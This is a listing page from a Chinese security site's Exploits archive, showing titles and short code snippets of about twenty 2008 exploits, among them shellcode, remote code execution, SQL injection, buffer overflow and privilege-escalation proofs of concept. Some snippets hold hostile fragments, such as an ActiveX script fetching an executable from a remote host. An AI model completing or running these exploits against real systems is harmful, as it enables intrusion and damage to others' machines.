首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
freebsd/x86 kill all processes 12 bytes
  日期:2008-09-10 10:12:22 点击:32 评论:0
***(C)oDed bY suN8Hclf*** DaRk-CodeRs Group productions, kid [FreeBSD x86 kill all procesess 12 bytes shellcode] Compile: nasm -f elf code.asm ld -e _start -o code code.o Assembly code: ---------------------code.asm------------------- section .text
Microworld Mailscan 5.6.a Password Reveal Exploit
  日期:2008-09-10 10:06:46 点击:61 评论:0
/* ---------------------------------------------------------------------------------------------- _____ ____ / ___/___ _____/ __ ___ _ __ __ / _ / ___/ / / / _ | / / ___/ / __/ /__/ /_/ / __/ |/ / /____/___/___/_____/___/|___/ [2008] Securit
Microsoft Windows Image Acquisition Logger ActiveX Control Arbitrary File Overwr
  日期:2008-09-10 09:09:25 点击:44 评论:0
object classid=clsid:A1E75357-881A-419E-83E2-BB16DB197C68 id='test'/object input language=VBScript onclick=tryMe() type=button value='Click here to start the test' script language='vbscript' Sub tryMe dim remURL remURL = http://victim.com/svchost.ex
Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC
  日期:2008-09-08 11:18:52 点击:76 评论:0
#!/usr/bin/perl -w # # Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC # # The vulnerability is caused due to an unspecified error in the cgis # files filter used for configure propierties. This can be exploited by # sending a specially cr
MemHT Portal <= 3.9.0 Remote Create Shell Exploit
  日期:2008-09-08 11:17:37 点击:114 评论:0
#!/usr/bin/perl # # MemHT Portal = 3.9.0 Perl exploit # # discovered written by Ams # ax330d [doggy] gmail [dot] com # # DESCRIPTION: #Script /inc/inc_statistics.php accepts unfiltered $_COOKIE's, #($_COOKIE['stats_res']) which later goes to MySQL re
Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (win32)
  日期:2008-09-08 11:16:46 点击:52 评论:0
?php echo ---------------------------------------------------------------n; echo SMF = 1.1.5 Admin Reset Password Exploit (win32-based servers)n; echo (c)oded by Raz0r (http://Raz0r.name/)n; echo ---------------------------------------------------
Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit
  日期:2008-09-08 11:15:57 点击:20 评论:0
!----------------------------------------------0 || | Flock Web Browser 1.2.5 Remote DoS Exploit| || |by Gjoko 'LiquidWorm' Krstic| || | http://www.zeroscience.org| || |liquidworm [t00t] gmail.com| | | | 06.09.2008| || 0------------------------------
Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow Exploit
  日期:2008-09-08 11:11:12 点击:83 评论:0
/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow This sploit Launches calc.exe .. classical buffer overflow ,a 500 byte buffer is causing the exeption. Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2. After preparation: |Access viol
CitectSCADA ODBC Server Remote Stack Buffer Overflow Exploit (meta)
  日期:2008-09-08 11:09:54 点击:83 评论:0
## # $Id: citect_scada_odbc.rb ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use
MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC
  日期:2008-09-08 11:08:21 点击:234 评论:0
/* -------------------------------------------------------------------------- * (c) ShadOS 2008 * _ _ _ _ _ __ _ _ _ * | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ * | __ / -_) | | ' | ' | / _` | ' _(_- * |_||____|_|_|_|__||_|___, |_||___/__/ *
Moodle <= 1.8.4 Remote Code Execution Exploit
  日期:2008-09-04 10:20:30 点击:77 评论:0
?php /** * Moodle = 1.8.4 remote code execution */ $url = 'http://target.ru/moodle'; $proxy = 'localhost:8118'; $code = $argv[1]; if(!$code) { echo 'Sample use: '.$argv[0].' phpinfo() phpinfo.html '.$argv[0].' echo `set` '.$argv[0].' /full/local/path
Google Chrome Browser 0.2.149.27 Automatic File Download Exploit
  日期:2008-09-04 10:19:51 点击:24 评论:0
*************************************************************************** Author: nerex E-mail: nerex[at]live[dot]com Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without a
e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit
  日期:2008-09-02 10:27:18 点击:23 评论:0
#!/usr/bin/perl ############################################################## # e107 Plugin BLOG Engine v2.2 SQL Injection Exploit # # ..::virangar security team::.. # # www.virangar.net # # C0d3d BY:virangar security team ( hadihadi ) # #special tn
VMware COM API ActiveX Remote Buffer Overflow PoC
  日期:2008-09-02 10:26:16 点击:42 评论:0
----------------------------------------------------------------------------- VMWare COM API Buffer Overflow url: http://www.vmware.com/ Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.net This was written for educational purp
WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
  日期:2008-09-02 10:18:53 点击:32 评论:0
?php /* ----------------------------------------------------------------- WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit ----------------------------------------------------------------- author...: Stack [-] vulnerable code in /fck/edi
Sun Solaris 8/9/10 and OpenSolaris versions below snv_96 snoop utility remote ex
  日期:2008-09-01 10:22:59 点击:36 评论:0
/*********************************************************** * hoagie_snoop.c * SUN SOLARIS SNOOP REMOTE EXPLOIT * + Sun Solaris 8/9/10 * + OpenSolaris snv_96 * * Bug discovered by Gael Delalleau * http://www.securityfocus.com/bid/30556 * * attack:/
Postfix <= 2.6-20080814 (symlink) Local Privilege Escalation Exploit
  日期:2008-09-01 10:22:08 点击:40 评论:0
#!/bin/sh # # rs_pocfix.sh (PoC for Postfix local root vulnerability: CVE-2008-2936) # by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt roman@rs-labs.com # # Tested: Ubuntu / Debian # # [ Madrid, 30.Aug.2008 ] # # Config writable_dir=/tmp spool_dir=/
Friendly Technologies Read/Write Registry/Read Files Exploit
  日期:2008-09-01 10:20:12 点击:28 评论:0
!-- Proof of Concept... Read write to registry and also read files More codes at irc.nix.co.il/#binaryvision ! -- html titleFriendly Technologies - Read/Write Registry/title object classid=clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B id='FT'/object sc
Acoustica Beatcraft 1.02 Build 19 (bcproj file) Local BOF Exploit
  日期:2008-09-01 10:18:08 点击:10 评论:0
#!/usr/bin/perl # # Acoustica Beatcraft (bcproj file) Local BOF Exploit # Author: Koshi # # Date: 08-30-08 ( 0day ) # Application: Acoustica Beatcraft # Version(s): v1.02 Build 19 # Site: http://acoustica.com/beatcraft/index.htm # Tested On: Windows
Invision Power Board <= 2.3.5 Multiple Vulnerabilities Exploit (revised)
  日期:2008-09-01 10:13:26 点击:44 评论:0
#!/usr/bin/php -q ?php error_reporting(E_ALL ^ E_NOTICE); # yeah ... it rox (: class ipb_spl { var $web; function main() { $this-mhead(); # Gimme your args $this-p_attack = $this-get_p('attack', true); $this-p_prox = $this-get_p('proxhost'); $this-p_
共637页/12733条记录 首页 上一页 [510] [511] [512] 513 [514] [515] [516] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved